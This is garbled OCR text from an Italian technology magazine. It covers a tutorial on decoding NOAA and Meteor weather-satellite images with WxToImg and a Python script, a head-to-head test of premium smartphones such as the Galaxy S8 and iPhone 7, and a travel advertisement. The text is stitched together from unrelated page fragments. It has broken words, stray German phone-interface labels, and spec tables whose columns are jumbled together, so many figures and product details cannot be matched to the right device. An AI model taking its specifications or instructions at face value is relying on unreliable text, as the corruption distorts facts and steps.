Latest Beta Version Stat: Richiede salone i sari pacchi ANNIE 


* Version. 2,112: Linux ALSA audio support, Liri 
improved scripting (w«pdone) support.. 


00 to the prmary computer as kmq © 
Computer at a time. You may not 
scade or decryut Dis software or 


ve reverse de 
male use of information, code or algorithms obtained m this way 


i 
È 
Note: when upgrading do not uninstali Wktolmg f | The noccimg programi are Copyright (€) 2001-2010 Central North 
over the old, Pubbshing Lintited. AIl rights reserved. È 


* Windows: Install package for Windows 95/4 | (converted fram a rpm package by allen version 8.69) 


processors (16.9MB). Installa pacchetto | | © Anmutta 

È ‘compatible n (8.02MB). È È 
processore 

. Rende I: for RedHat and other RPM compatible Linux on Intel and compatible processors 
» Linux/FreeBSD tar.gz: for Slackware and other Linux without package support and for 
FreeBSD with Linux compatibility on Intel and compatible processors (8. 06MB) 

. for Ubuntu 8.10 amd84 and other new 64-bît Linux on intel and AMDB4 
processors (8.51MB). 


pi 
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SETUP IN CORSO 

Il software necessario per convertire l'audio 

in immagini si chiama WxTolImg. È liberamente 
scaricabile dal sito Web www.wxtoimg.com/downloads, in 
diversi formati [ci sono anche i pacchetti per sistemi De- 
bian like e Fedora]. 


ET SUIS RICETTE NANE LE 02) D'INBCIS MISISASO APE, SIRIA IO SIN ESPE RAI Me 


1) camminare-sulle-acque i SHPST_088110_3045 
‘i costruisciti-da-solo-omeopatia ) DetFilms_Gunfire.wav 
\& ocim NOAA-15:0530.Wav 
| grotta-pogrize-25-06-2017 NOAA19.wav 
ly Shotgun Fire,wav LI 


Utilizzare ilprogramma è molto semplice: basta 

cliccare sul menu File e scegliere Open audio. 
Nella nuova finestra, indichiamo il file .wav che abbiamo 
prodotto con Audacity. La produzione dell'immagine può 
richiedere un minuto. 7 
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nter City and Country and click Lookup Lat/Lon or enter 
atitude and longitude in degrees and fractions of degrees, 
lorth and east should be entered as positive numbers, south and 
lest as negative numbers (example: enter 45 degrees 30 minutes 
lest as -45.500). 


Latitude: |45,650 è 
Longitude: |13.780 
iltitude (meters): {0.0 


[Use GPS on /dev/ttyS1 =| at 4800 | baud 


*IETTETEPIEPIMSFINITIATAEVESSA RISENTITO IV HENNTTIPRRNATA TO RIVTTREDN ESA BEVENTATA teseTIIAIIEI RE IAZORR AN arena 


LA POSIZIONE 


AL primo avvio, il software (che può essere 
lanciato anche da un terminale con il comando 
xwxtoimg - da non dimenticare la “x” iniziale) ci chiede 
di indicare la nostra città di residenza per calcolare le 


dovute correzioni dell'immagine. 


i 
j 


TETTE 


Porsrtiasrrvoritoiali 


fippancements | gptions firoiection jmase 
5 Ngrmal & 
istine 
‘ontrast enhance 


pi fatsa 3-D ) 
ISA multispectral analysis (NOAA-# 2-4/1-4) 
È f 4/14) 


ecipit 14 


lyph false 
REESE (NOAA) 


h precipitation (NOAA) 


IN FALSI COLORI 
L'immagine originale prodotta è una coppia di 
foto in bianco e nero. Tuttavia, è possibile otte- 
nere una visione in falsi colori cliccando sul menù En- 
chacements/HVCT. Il risultato simula i reali colori della 
Terra, distinguendo mare, terraferma, e nuvole. 


Fig. 4 - Un'immagine ottenuta dal satellite NOAA19 


più complicati da intercettare perché è necessario avere una 
perfetta sintonizzazione sul loro segnale. Per poter inter- 
cettare questi satelliti si comincia scaricando un apposito 
script: www.edmaster.it/url/6994. Estratto lo script dal file .zip, 
è necessario aprirlo con un editor di testo, per esempio con 
Kate o Gedit. Ora, basta premere Ctrl+F e cercare la parola 
“ubuntu”: tutto quello che dobbiamo fare è modificare tale 
parola con il nome del nostro utente. In questo modo, ad 
esempio, se il nostro username è “luca”, allora la riga nello 
script dovrà contenere il percorso “/home/luca/Desktop/”. 
Salvato lo script premendo Ctrl+S, si può chiudere l’editor 
di testo. A questo punto lo script va avviato con Python: lo 
si può fare cliecandoci sopra col tasto destro e scegliendo la 
voce Apri con e selezionare dall’elenco l’interprete Python. 
In alternativa, direttamente da terminale, lanciamo: 


python meteor_qpsk_rx rtl.py 


Verrà creato un semplice file sul desktop: per ora non ci ser- 
ve, significa solo che lo script sta funzionando. Chiudiamo 
lo script ed andiamo a scaricare il programma LRPT dal sito 
www.edmaster.it/url/6995. Scelta l’ultima versione disponibile, 


la si installa sul proprio sistema utilizzando Wine. Il program- 
ma, infatti, è un eseguibile Windows, che può funzionare su 
GNU/Linux proprio grazie a Wine. Infine, si installa un ultimo 
software, anch'esso da avviare con Wine, chiamato Smooth 
Meteor (www.edmaster.it/url/6996). Quando, secondo Gpre- 
dict, il satellite entra nel nostro raggio d’azione possiamo 
avviare lo script Python. Vedremo un grafico cartesiano con 
degli insiemi di punti: dovremmo avere una sorta di costella- 
zione data da quattro ammassi di punti variabili. Finché c’è 
questa figura, vuol dire che stiamo ricevendo il segnale dal 
satellite. Quando la figura scompare, chiudiamo la finestra 
dello script. A questo punto, avviamo LRPT e carichiamo 
in esso il file che è stato prodotto dallo script Python. Da 
questo programma si deve ottenere un'immagine a colori, 
premendo il pulsante Generate RGB, da salvare in un file 
Bitmap. L'immagine può essere ora aperta con l’altro sof- 
tware, Smooth Meteor, per sistemarne le dimensioni e pro- 
durre la fotografia finale. 


en ci r tube 
} te pa le out 


| Topreamp. 


Fig. 5 - Un'altra antenna valida per ricevere segnali dai satelliti 
NOAA e Meteor è la QFH, abbastanza facile da costruire come indi- 
cato sul sito https://www.jcoppens.com/ant/qfh/index.en.php 
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Vogi la di vac ar 


vai su TrovaViaggi.it! 


Il TrovaViaggi di Turistipercaso.it 
è sempre più ricco e ti offre 

la possibilità di organizzare i 
tuoi viaggi scegliendo tra le 
migliori Offerte Speciali e Last 
Minute proposte da Agenzie, 
Tour Operator, Hotel, B&B e 
Agriturismi. 


Sei un 
e vuoi promuovere la tua 
struttura sul TrovaViaggi? 


Fai conoscere la tua attività a 
più di 10 milioni di viaggiatori! 
Collegati a www.trovaviaggi.it 

Clicca sul box “Scopri il TrovaViaggi” 
Segui le istruzioni e... in pochi click 
la tua struttura sarà online! 


Migl ferte difqualità a prezzi imbattibili ti aspettano! 
| Scoprile su www.trovaviaggi.it 


dd“ weca 


| Sfida tra super 
smartphone . 


Sotto la lente 10 modelli top di gamma. Tra questi c'è anche il “nemico” iPhone 7. 
Ma qual è l'indiscusso re del momento? 


li smartphone top di gamma 
G interessano ogni tasca: anche 

l'utente meno abbiente è co- 
munque attratto dall'idea di spendere 
alcune volte anche quasi 1000 euro per 
portarsi a casa un telefonino che a mo- 
menti sia anche in grado di fare un buon 
caffè. Ma qual è veramente il miglior 
smartphone in circolazione? Quale offre 
l'autonomia maggiore, la fotocamera 
più efficiente e le prestazioni più al top? 


Mittwoch, 7. Septem 
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In maniera del tutto obiettiva, abbiamo PERCHE SPENDERE 


deciso di mettere in lista anche l'acerri- Il modello più economico fra quelli te- 
mo nemico di Android: l'iPhone 7, così stati costa oltre 480 euro, mentre il più 
come la sua versione "pompata" Plus. costoso ne richiede oltre 1000! Ma cosa 
Ma, per fortuna, dai no- 
stri risultati si evince un 
risultato che fa onore 
all'OS firmato Google. 


18 3il 90% ® 19:17 
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Microsoft Play Store 


Apps 


Chrome 


LU 


Telefon 


i Wa9. 


Q Telefon durchsuchen 


YouTube 


Maps 
Facebook 


Galerie 


Samsung 
Members 


Kamera 


iBooks 


Nachrichten 


Kalender 


Home Health 


Rechner 


5 06 


Sicherer Vodafone 
Ordner Serviees 


Einstellungen 


Phone Safari 


potrà ottenere l’utente, spendendo cifre 
così sostanziose? 

e Velocità di.lavoro più elevata: i su- 
perprocessori di ultimissima generazio- 
ne vengono installati solo su smaripho- 
ne top di gamma, che offrono anche 
RAM in abbondanza (fino a 6 GB). 

e Ampia memoria interna: i migliori di- 
spositivi Android testati offrono 64 GB 
e l’iPhone ne offre addirittura un model- 
lo da 256 GB, però non ulteriormente 
espandibile. 

e Veloce LTE: attraverso la tecnologia 
LTE, numerosi smartphone testati han- 
no offerto velocità massime di lavoro, 
da 450 a 600 Mbps. AI momento, la rete 
LTE italiana arriva solo fino a 150 Mbps, 
ma Vodafone consentirà presto di sfrut- 
tare la velocità di 500 Mbps. 

e Fotocamere migliori: Super Slow 
Motion, camere duali di gran pregio, 
immagini buone anche con luce scar- 
sa: solo smariphone di classe superiore 
sono in grado di offrire foto e video di 


)@6506 


on - Nachrichten 
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qualità straordinaria. 

e Funzioni extra innovative: i nuovi 
modelli Galaxy S8 offrono, ad esem- 
pio, la ricarica wireless. Inoltre, grazie 
alla docking station “Samsung DeX” 
(150 euro), questi dispositivi possono 
essere collegati ad un monitor nonché 
a mouse e tastiera. Dal test è emerso 
che, questa funzionalità si rivela pratica 
e sufficiente per navigare in Internet e 
lavorare ad esempio con editor di testi. 
Sullo schermo dell’HTC U Ultra è pre- 
sente anche un minuscolo display ex- 
tra, che consente di visualizzare infor- 
mazioni aggiuntive, risparmiando così 
sul consumo della batteria. 


ANDROID 0 IPHONE? 


Come ben sappiamo, il mondo degli 
smartphone si divide tra utenti Android 
e iPhone. Tecnologicamente, i disposi- 
tivi si differenziano molto poco anche 
se l’iPhone, a detta di alcuni, si rivela 
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Tower Hamlets 
Aktual. 29.03 18:40 


[) 


Internet Play Store Kamera 


pa) 
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un pizzico più semplice da gestire. 

In ogni caso, sarebbe stupido negare 
che il sistema operativo di casa Apple 
sia inoltre in grado di sfruttare l’hardwa- 
re in modo più efficiente, consentendo 
allo smartphone una velocità di lavoro 
più elevata: iOS gira esclusivamente 
su iPhone, mentre Android su un'am- 
pia fascia di device. Per contro, Apple, 
non consente all’utente l’uso di alcune 
innovazioni tecniche, lasciandogli poca 
libertà d’azione ed inoltre il dispositi- 
vo si rivela decisamente più costoso. 
Dunque, la risposta dovrebbe essere 
alquanto evidente. 


GRANDE O PICCOLO? 


Apple, Huawei e Samsung offrono i 
loro ultimi modelli sia in versione gran- 
de, che in una variante di formato extra 
large. | grandi modelli “Plus” si rivelano 
ideali per tutti gli utenti che si servono 
dei loro smartphone per visionare filma- 
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ESAME DEL CASE 
DISPLAY PIU AMPIO 


Da anni, i fan degli smartphone desiderano poter disporre di uno smartphone 
“privo di cornice”. Occorrerà attendere ancora un po’, ma il Galaxy S8 e l'LG 

G6 stanno quasi raggiungendo l'obiettivo e sono già in grado di realizzare una 
cornice assottigliata, con un display che si estende in lunghezza. L'LG 66 riesce 
quindi ad offrire un aspectratio di 18:9 e il Samsung addirittura di 18,5:9. Tutto 
questo consente di rendere più ampia la superficie del display sul frontale dello 
smartphone: una piccola rivoluzione nel design! Svantaggio: iltasto Home, che 
consente, ad esempio, di individuare lo smartphone nella tasca dei pantaloni e di 


BATTERIA: I MODELLI PLUS 
OFFRONO LA BATTERIA 
PIU POTENTE 


I modelli “Plus” non si distinguono solo per un ampio 
display, ma offrono anche spazio per accogliere batterie 


più potenti, che consentono autonomie più lunghe. 
Il'‘piccolo” Huawei P10, ad esempio, presenta un'autonomia 
più lunga di quella dell'iPhone 7 Plus, mentre l'iPhone 7 

ne offre una più lunga rispetto al Galaxy S8 Plus. 


Huawei 


Apple 


iPhone 7 Plus | 


iPhone 7 


Samsung 
Galaxy $8 Plus | 


Galaxy $8 


ti su YouTube o usano il dispositivo 
come video player, nonché per scrive- 
re lunghe e-mail o eseguire altri lavori 
da ufficio. | grandi schermi procurano 
vantaggi anche ad utenti con proble- 
mi di vista. Dall'altro lato, i modelli XXL 
non si rivelano pratici ad essere usa- 
ti con una sola mano, ad esempio il 
case in vetro dell’HTC U Ultra risulta 
essere molto scivoloso. Solo 3 candi- 
dati al test si rivelano veramente ma- 
neggevoli: il Galaxy S8, il Huawei P10 
e l'iPhone 7 che vantano una scocca, 
ampia meno di 70 millimetri. Punto di 
forza del Galaxy S8: grazie alla forma 
allungata del display e ad una cornice 
stretta, il sottile S8 offre una superficie 
del display ampia come quella. del gi- 
gantesco iPhone 7 Plus. 
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sbloccare immediatamente il dispositivo, dovrà essere posizionato sul retro. 


Sul Galaxy S8, il display occupa ? n oa della superficie del frontale. 
L'S8 Plus, quindi, non consente più di essere gestito con una sola mano. 


OC: à 


è 0 sali 
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BATTERIA: QUANTO 
E IMPORTANTE? 


Nel corso del test, è stata riscontrata una 
buona autonomia solo con i dispositivi di 
Huawei, di Honor e dell’iPhone 7 Plus. 
Per contro, nelle prove, tutti gli smart- 
phone Android, grazie alla modalità di 
ricarica rapida, hanno consentito di.rica- 
ricare per metà la batteria del dispositivo 
in circa mezz'ora. | Galaxy S8/S8 Plus 
offrono addirittura la ricarica wireless per 
induzione. 


FOTOCAMERA: CHI HA 
QUELLA MIGLIORE? 

La migliore qualità d’immagine è offer- 
ta dall’HTC U Ultra e dai modelli iPho- 
ne 7, che si rivelano convincenti sia 


Al confronto, l'iPhone 7 si rivela quasi voluminoso: il display occupa solo il 65 
percento della superficie frontale! Lo stesso vale anche per il Sony XZs. 


con luce diurna che crepuscolare. Con 

buone condizioni di luce, anche gli altri 

smartphone Premium consentono di 

scattare foto di buona qualità. Alcuni 

smartphone si rivelano interessanti an- 

che per altre funzioni extra: 

® Super Slow Motion: il Sony Xperia 
XZs, in grado di registrare 960 foto- 
grammi al secondo, offre una stra- 
ordinaria modalità di riproduzione 
al rallentatore. L'unica complicazio- 
ne è che la funzione al rallentatore 
non potrà durare più di 0,182 se- 
condi. Chi vorrà eseguire riprese al 
rallentatore più lunghe, ‘apprezzerà 
maggiormente la funzione al ralenti 
dell’iPhone (240 fotogrammi al se- 
condo). 

e Camere duali: poter disporre di due 


yo 


CHI OFFRE LA 
CAMERA MIGLIORE? 


Con luce diurna, la migliore qualità d'immagine è offerta 


dall'HTC U Ultra. Anche le camere dell'iPhone 7 Plus, del 

Sony Xperia XZs e dell'iPhone 7 hanno però ottenuto la valu- || 
tazione “buono”. Il display del Galaxy 58/58 Plus mostra foto || 
di qualità straordinaria, ma nel corso di un'accurata e severa 
prova di laboratorio, sono state riscontrate fastidiose imper- 
fezioni, rumore digitale e dettagli dell'immagine sfocati. Con 


luce scarsa i modelli serie 58 offrono comunque foto migliori 


rispetto al predecessore S7. Con luce scarsa, solo entrambi 
i modelli dell'iPhone 7 e l'HTC Ultra, consentono di scattare 
foto di qualità soddisfacente, senza utilizzo del flash. 


; o dla 
Anche con luce scarsa le fotocamere dovrebbero riprodurre fedelmente 
i colori. L'iPhone 7 Plus è in grado di mostrare un numero più elevato di 


dettagli ed un minor rumore digitale. 


Se osservate attentamente, le foto scattate con luce scarsa dal Gala 


S8, mostrano un minor numero di dettagli. 


obiettivi posteriori consente di otte- 


nere svariati effetti. L'iPhone 7 Plus, 
ad esempio, offre un obiettivo simi- 
le a un “Tele”, che consente di ese- 
guire riprese simili a quelle fornite 
da uno zoom 2x, senza perdita di 
qualità. L’LG G6, grazie ad un super- 
grandangolo consente di inquadra- 
re un’ampia area dell'ambiente cir- 
costante. | dispositivi Huawei P10 e 
l’Honor 8 Pro consentono di scattare 
ottime foto in bianco e nero e di uti- 
lizzare uno:zoom digitale più nitido. 


QUALE MODELLO OFFRE 
IL MIGLIOR DISPLAY? 


Relativamente alla luminosità e al con- 
trasto, i display dei modelli Galaxy S8 
superano di gran lunga la concorrenza. 


PUNTEGGI GEEKBENCH prrrs; 


iPhone 7 Plus Galaxy S8 Plus LG G6 


741,2 


Anche LG G6, Huawei P10 Plus, Honor 
8 Pro e HTC U Ultra offrono una risolu- 
zione elevatissima, che si rivela utile, ad 
esempio, se l’utente indossa occhiali VR. 


DESIGN: SOLO 3 SONO 
VERAMENTE CHIC! 


E che dire dell’estetica? Tutti gli smar- 
tphone top di gamma testati sono rac- 
chiusi in eleganti case di vetro e metal- 
lo. | dispositivi di Apple, LG, Samsung 
e Sony sono impermeabili. Il Galaxy 
S8 e S8 Plus offrono il design più in- 
novativo: lo schermo, oltre ad occu- 
pare quasi tutto il frontale, si estende 
e si incurva anche lungo i bordi della 
cornice. Esteticamente, il case in ve- 
tro dell’HTC U Ultra, si rivela una me- 
raviglia: Fastidioso che nessuno dei 


CHI OFFRE LA VELOCITÀ 
DI LAVORO PIÙ ELEVATA? 


| produttori di smartphone si sfidano a spada tratta per offrire dispositivi più performanti relativamente alla 
velocità di lavoro (rilevabile attraverso i Benchmarks). Con le App che sfruttano tutte le unità di calcolo del 
processore, il Galaxy S8 (Exynos 8895), nel test Geekbench si è piazzato davanti a tutti gli altri candidati al test. 
Alcune App necessitano però di un solo modulo di calcolo e qui l'iPhone si è rivelato il dispositivo più veloce. 


Nell'uso pratico, si rivelano importanti anche l'usabilità e il 
software in dotazione. La redazione ha quindi provveduto a 
sviluppare una propria metodologia per rilevare la velocità 
di lavoro e di usabilità, senza ricorrere ad App di benchmark, 
ma basandosi sull'utilizzo pratico. E stato quindi possibile 
verificare con quale velocità è possibile avviare menu ed 
App, quanto tempo necessita uno smartphone per editare un 
video, nonché la velocità di lavoro del browser. 

Risultati 

L'iPhone 7 Plus si è preso parecchie lunghezze di 
vantaggio sullo smartphone Android più veloce. 


| 650,3 


nr rare aeree 


SI VEDE SOTTO AL SOLE? 


Con le condizioni di luce dei mesi estivi, i display degli smartphone possono mettere in 
mostra le loro prestazioni migliori. Sono in grado di offrire una buona leggibilità anche sotto 
un'intensa luce solare? In questa situazione, la luminosità gioca un ruolo preminente. La buo- 
na notizia è che gli smartphone Premium testati vantano tutti display molto nitidi, in grado di 
offrire valori di luminosità superiori a 500 Candele al metro quadro. | modelli 58 di Samsung 
si sono rivelati nettamente i più luminosi. 


LUMINOSITÀ DISPLAY (CANDELE AL M2) 


596,9 5494 5101 
Samsung bile Apple Apple Huawei Sony Huawei LGG6 Honor8 HICU 
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dispositivi testati possa essere aperto 
per sostituire la batteria. 


TIRIAMO LE SOMME 


La flotta Galaxy S8 di Samsung stupisce 
per il rivoluzionario design del display e 
per un eccellente mix di tecnologia. Gra- 
zie a queste peculiarità, l'ampio Galaxy 
S8 Plus si piazza al primo posto, distac- 
cando l’iPhone 7 Plus. Anche il Galaxy 
S8, di formato più piccolo, si rivela at- 
tualmente lo smartphone migliore, con 
dimensioni non extra-large. Relativa- 
mente al prezzo, si distingue il pratico 
Huawei P10 dotato di una buona camera 
duale e in grado di offrire un'autonomia 
più lunga, rispetto a quella dei modelli 
Galaxy S8. L’unico dispositivo Dual-SIM 
testato, è l’Honor 8 Pro. 


® 
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TEST SUPER 
SMARTPHONE 


Quanto è efficiente la dotazione? 


Facilità d'uso e affidabilità 


SAMSUNG Galaxy $8 Plus 


Prezzo: 787 Euro 


CPU / RAM: Exynos 8895 / 4 GB 

Dimensioni display / Risoluzione: 6,2 pollici / 2960 x 1440 pixel 
Fotocamera frontale / posteriore: 8 Megapixel / 12 Megapixel 
Sistema operativo / SIM: Android 7.0 / nano 

Dimensioni: 158 x 75 x 8,35 mm 

Memoria: 64 GB (non esistono altre varianti) 


Efficientissima: il Galaxy S8 Plus vanta il miglior display, la fotocamera è 
ok. E' il più veloce smartphone Android del test. 


APPLE iPhone 7 Plus (256 GB) 
Prezzo: 1038 Euro 


CPU / RAM: Apple A10 / 3 GB 

Dimensioni display / Risoluzione: 5,5 pollici / 1080 x 1920 pixel 
Fotocamera frontale / posteriore: 7 Megapixel / 12 Megapixel 
Sistema operativo / SIM: i0S 10 / nano 

Dimensioni: 158 x 78,5 x 8,75 mm 

Memoria / varianti: 256 GB / 32 (719 Euro), 128 (830 Euro) 


Schermo ampio e luminoso. La fotocamera è buona e dispone di un tele- 
obiettivo supplementare. La memoria intema non è espandibile. 


Semplicissimo da usare e veloce; scanner iride buono; sensore impronta 
complicato da usare. Troppo ampio per un uso con una sola mano. 


Nessun smartphone è così semplice da usare ed offre anche una velocità 
elevata. Attenzione: la versione più economica da 32 GB è più lenta. 


Quanto è idoneo il dispositivo per un uso quotidiano? 


Si rivela ok. Il case è impermeabile; l'autonomia potrebbe però essere più 
lunga. Non è possibile aprire il case. 


Autonomia buona; case impermeabile. Non è possibile sostituire la batte- 
ria, ma il case può essere leggermente aperto. 


Quanto è valida la qualità vocale per le chiamate e in | Laricezione mobile è ottima, soprattutto attraverso LTE. La qualità vocale 


ricezione? 


per le chiamate è generalmente buona, ma quella del vivavoce è mediocre. 


La ricezione è ok, come pure la qualità vocale per le chiamate. 


Qualità della connessione per Internet? 


La velocità via LTE è al top (anche se non così elevata come i modelli USA 
con processore Snapdragon 835). La WLAN è velocissima. 


La\LAN, grazie allo standard ac è velocissima e utilizzabile su entrambe 
le frequenze. La dotazione per la LTE è buona. 


Bonus / Malus 


RISULTATO DEL TEST 
RISULTATI DEL TEST IN DETTAGLIO 


Quanto è efficiente la dotazione? 
Schermo: luminosità / contrasto / fedeltà cromatica 


luminoso (769,9 Cd) / molto elevato (7759:1) / elevata (03,40%) 


zoom ottico 


È 


luminoso (6917 Cd) / scarso (901:1) / molto elevata (08,10%) 


Qualità schermo (risoluzione / densità pixel / diagonale del display) 


elevata (14402960 Pixel /531 ppi / 15,81 cm) 


Test visivo: qualità foto con luce scarsa / con flash / per eventi sportivi (voto) 


elevata (1080 x1920 Pixel /401 ppi / 14,02 cm) 


molto povera di dettagli (3,6) / lieve rumore digitale (5,4) / sfocature visi- 
bili su soggetti in movimento (9) 


Qualità foto con luce diurna: Giudizio tecnico / Test visivo 


Qualità dei video con luce diuma 


lievi sfocature (6) / immagini un po' scure (6) / sfocature su soggetti in 
movimento appena visibili (8) 


un po'scarsa (Voto: 6,90) / rumore digitale, alterazioni cromatiche, le 
aree scure dell'immagine mostrano pochi dettagli (Voto: 6,10) 


elevata (Voto: 8,43) / fastidioso rumore digitale (Voto: 6,64) 


elevata (fotogrammi nitidi) 


elevata (fotogrammi molto nitidi e ricchi di dettagli) 


Latenza di scatto / Tempo di memorizzazione / risoluzione foto /video /funzioneral- { 0,25/0,4s/12,0 MP /2160p con 30fps/ 60fps con 2,1MP/ | 0,15 /0,185/12,0MP/2160p con 60 fps / 240 fps con 2,0 


Tentatore con frequenza max. fotogrammi video / impostazioni manuali / zoom 


estese / no 


Fotocamera frontale: qualità 


elevata (buona nitidezza, scarso rumore digitale, leggero effetto tampone) 


MP / estese / si (2x) 
un po'scarsa (offre una buona nitidezza e un rumore digitale scarso) 


Velocità del browser / funzioni 


Connessioni per trasferimento dati: USB / Bluetooth / NFC 


un po' lento / molto numerose 


velocissimo / molto numerose 


USB 2.0 / BluetoothV.5.0 / si 


USB2.0 / BluetoothV/4.2 / si 


Velocità max.via USB (in fase di scrittura / lettura) 


un po' lenta (18,467 MB/s / 25,35 MB/s) 


un po lenta (20,19 MB/s / 22,09 1B/S) 


Trasferimento contenuto visualizzato da schermo: via cavo / wireless 


solo con Samsung Dex Station / Miracast 


Adattatore Apple Lightning / Airplay 


Memoria intera / max. / Cloud /App su scheda di memoria 


Sensori di posizione e funzioni 


scarsa (52,8 GB) / 253 GB tramite microSD / 15 (GB / no 


molto numerosi (tra cui il barometro) 


molto abbondante (245 GB) / non espandibile / 5 GB / - 


molto numerosi (tra cui il barometro) 


Qualità suono con cuffie / impianto HI-FI / uscita cuffie / funzioni 
lettore MP3 


distorto / quasi fedele all'originale / quasi fedele all'originale (vo- 
lume troppo alto) / molto estese 


un po' distorto / quasi fedele all'originale / quasi fedele all'origi- 
nale / molto estese 


Completezza funzioni preimpostate dal produttore 


Accessori in dotazione 


Funzioni perl fitness e per la salute 


Facilità d'uso e affidabilità? 
Velocità di usabilità e di lavoro 


Maneggevolezza e comfort di usabilità / funzioni di ricerca 


molto elevata (occorre Account per Google e Samsung) 


elevata (non è possibile la navigazione offline) 


cavo USB, cuffie, alimentatore per ricarica rapida 


cavo USB, cuffie, alimentatore 


molto numerose (molto estese, numerosi sensori) 


molto elevata e veloce 


numerosi (tra cui il contapassi) 


molto elevata e velocissima 


semplice usabilità / estese 


semplice usabilità / estese 


Impartizione comandi vocali / funzione lettura ad alta voce 


funzione confortevole / un po' scomoda 


funzione confortevole / un po' scomoda 


Blocchi per accesso al dispositivo 


molto numerosi (scanner per iride e sensore per impronta digitale, aggirabili) 


Sicurezza: (blocco remoto / spegnimento remoto / localizzazione / awisi) 
Quanto è idoneo il dispositivo per un uso quotidiano? 
Autonomia (ore:min): utilizzo tipico/utilizzo minimo/capacità/ricarica rapida 


Peso / spessore / rapporto area display con frontale del dispositivo 


numerosi (il sensore per impronta digitale può essere ingannato) 


molto estesa (si / si / si / si) 


abbastanza lunga (10:27) / abbastanza lunga (32:32) / 3500 mAh / si 


estesa (si / si / si / no) 


lunga (11:58) / lunga (36:15) / 2000 mAh / no 


basso (173 grammi) / sottile (8,35 mm) / elevato (83%) 


un po' elevato (188 grammi) / sottile (8,75 mm) / un po' scarso (68%) 


Test di caduta / Resistenza ai graffi scocca / schermo / impermeabilità 

Dual SIM/batteria rimovibile/ radio / connettore cuffie / ricarica a induzione 
Quanto è valida la qualità vocale per le chiamate e in ricezione? 
Uso del telefono: Test uditivo / vivavoce / idoneo per HD Voice 


ok / molto elevata / molto elevata / si (967) 


ok / molto elevata / molto elevata / si (IP67) 


no/no/no/si/si 


qualità buona / leggermente disturbato / si 


no / no / no / tramite adattatore / no 


qualità buona / leggermente disturbato / si 


Qualità d'invio e ricezione con UMTS / LTE 800 / LTE 1800 


Voto: 7,68 / Voto: 7,98 / Voto: 8,02 


Voto: 6,46/ Voto: 7,48 /Voto: 7,34 


Indice radiazioni rilevato da COMPUTER BILD / Valore radiazioni 
Qualità della connessione per Internet? 


molto basso (0,05) / molto basso 


molto basso (0,1) / molto elevato 


Velocità max. della connessione mobile per trasferimento dati CAT 9, MAX, 452 Mbps (LTE) CAT 10, max 452 Mbps (LTE) 
Frequenze WLAN / standard e velocità nominale per collegamento 2,4 GHz e 5 GHz / ac fino a 867 Mbps 2,4GHz e 5 GHz / ac fino a 867 Mbps 
da . 
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SAMSUNG Galaxy $8 


Prezzo: 649 Euro 


CPU / RAM: Samsung Exynos 8895 / 4 GB 

Dimensioni display / Risoluzione: 5,8 pollici / 2960 x 1440 pi- 
xel 3 

Fotocamera frontale / posteriore: 8 Megapixel / 12 Megapixel 
Sistema operativo / SIM: Android 7.0 / nano 

Dimensioni: 149 x 68,6 x 8,35 mm 

Memoria: 64 GB (non esistono altre varianti) 


APPLE iPhone 7 (25608) 

Prezzo: 769 Euro 
CPU / RAM: Apple A10 / 3 GB 
Dimensioni display / Risoluzione: 4,7 pollici / 1334 x 750 pixel 
Fotocamera frontale / posteriore: 7 Megapixel / 12 Megapixel 
Sistema operativo / SIM: i0S 10 / nano 
Dimensioni: 138,3 x 67,75 x 8,3 mm 
Memoria / varianti: 256 GB / 32 GB (619 Euro), 128 (712 Euro) 


LG c6 


Prezzo: 549 Euro 


CPU / RAM: Qualcomm Snapdragon 821 / 4 GB 

Dimensioni display / Risoluzione: 5,7 pollici / 2880 x 1440 pi- 
xel 

Fotocamera frontale / posteriore: 5 Megapixel / 13 Megapixel 
Sistema operativo / SIM: Android 7 / nano 

Dimensioni: 149 x 72,5 x 8,13 mm 

Memoria: 32 GB (non esistono altre varianti) 


Il Galaxy S8 vanta un display nitidissimo ed una fotocamera come si deve. Si 
è rivelato il più veloce dispositivo Android tra quelli testati. 


Schermo ampio e luminoso. La fotocamera non offre il secondo obiettivo 
dell'iPhone 7 Plus. La memoria intema non è espandibile. 


Display ampio, nitido e luminoso (5,7 pollici); fotocamera duale con obietti- 
vo grandangolare. Memoria intema espandibile tramite microSD. 


Semplicissimo e veloce da usare; scanner iride buono; ssensore impronta 
complicato da usare. Molto maneggevole malgrado l'ampiezza del display. 


Molto pratico e maneggevole da usare. Offre un'elevata velocità di lavoro.At- 
tenzione: la versione più economica da 32 GB è più lenta. 


Anche con display XXL, l'LG G6 è molto compatto. Malgrado sia dotato di 
una CPU dello scorso anno, la velocità di lavoro dello smartphone è elevata. 


L'autonomia offerta è la più breve tra tutti i candidati al test. Il case è imper- 
meabile, ma non è possibile aprirlo. 


Autonomia ok, case impermeabile. La batteria non può essere sostituita, ma 
Îl case può essere leggermente aperto. 


Autonomia ok (11 ore). Peso del dispositivo minimo; case resistente ai graffi; 
non supporta la Dual SIM; ricarica wireless solo con modello USA. 


La qualità di ricezione è straordinaria e attraverso la LTE è addirittura più effi- 
ciente di quella dell'S8 Plus. E possibile collegare due paia di cuffie bluetooth. 


Ricezione e qualità vocale per le chiamate sono buone. 


Nel test uditivo la qualità di ricezione si è rivelata adeguata; buona qualità 
vocale per chiamate e ricezione. Basso livello di radiazioni. 


La velocità via LTE è straordinaria (ma non così elevata come con i modelli 
USA con CPU Snapdragon 835).WLAN velocissima. 


Grazie al nuovissimo standard ac, laWVLAN è velocissima e utilizzabile con 
entrambe le frequenze. Buona la dotazione per la LTE 


luminoso (741,2 Cd) / molto elevato (9227:1) / elevata (93,80%) 


elevata (1440 x 2960 Pixel / 568 ppi / 14,69 cm) 


abbastanza luminoso (650,3 Cd)/scarso (900:1)/molto elevata (98,30%) 
un po'scarsa (750 x 1334 Pixel / 326 ppi / 11,93 cm) 


Lo smartphone è in gradio di supportare la WLAN ac fino a 867 Mbps, nonché il 
veloce trasferimento dati via LTE CAT 11 con una velocità massima di 600 Mbps. 


abbastanza luminoso (549,4 Cd) / scarso (1094:1) / elevata (95,30%) 


elevata (1440 x 2880 Pixel / 565 ppi / 14,53 cm) 


immagini molto povere di dettagli (3,6) / lieve rumore digitale (5) / visibili 
sfocature su soggetti in movimento (9) 


visibili sfocature (6) / immagini un po' scure (6) / sfocature appena visibili 
susoggetti in movimento (8) 


elevata (Voto: 8,02) / rumore digitale, alterazioni cromatiche, pochi detta- 
gli sulle aree scure dell'immagine (Voto: 6,10) 


rumore digitale molto intenso (2) / visibili imperfezioni sulle immagini (4) / 
lievi sfocature su soggetti in movimento (7,8) 


elevata (Voto: 8,06) / fastidioso rumore digitale (Voto: 6,64) 


elevata (Voto: 7,78) / alterazioni cromatiche (Voto: 5,88) 


elevata(fotogrammi nitidi) 


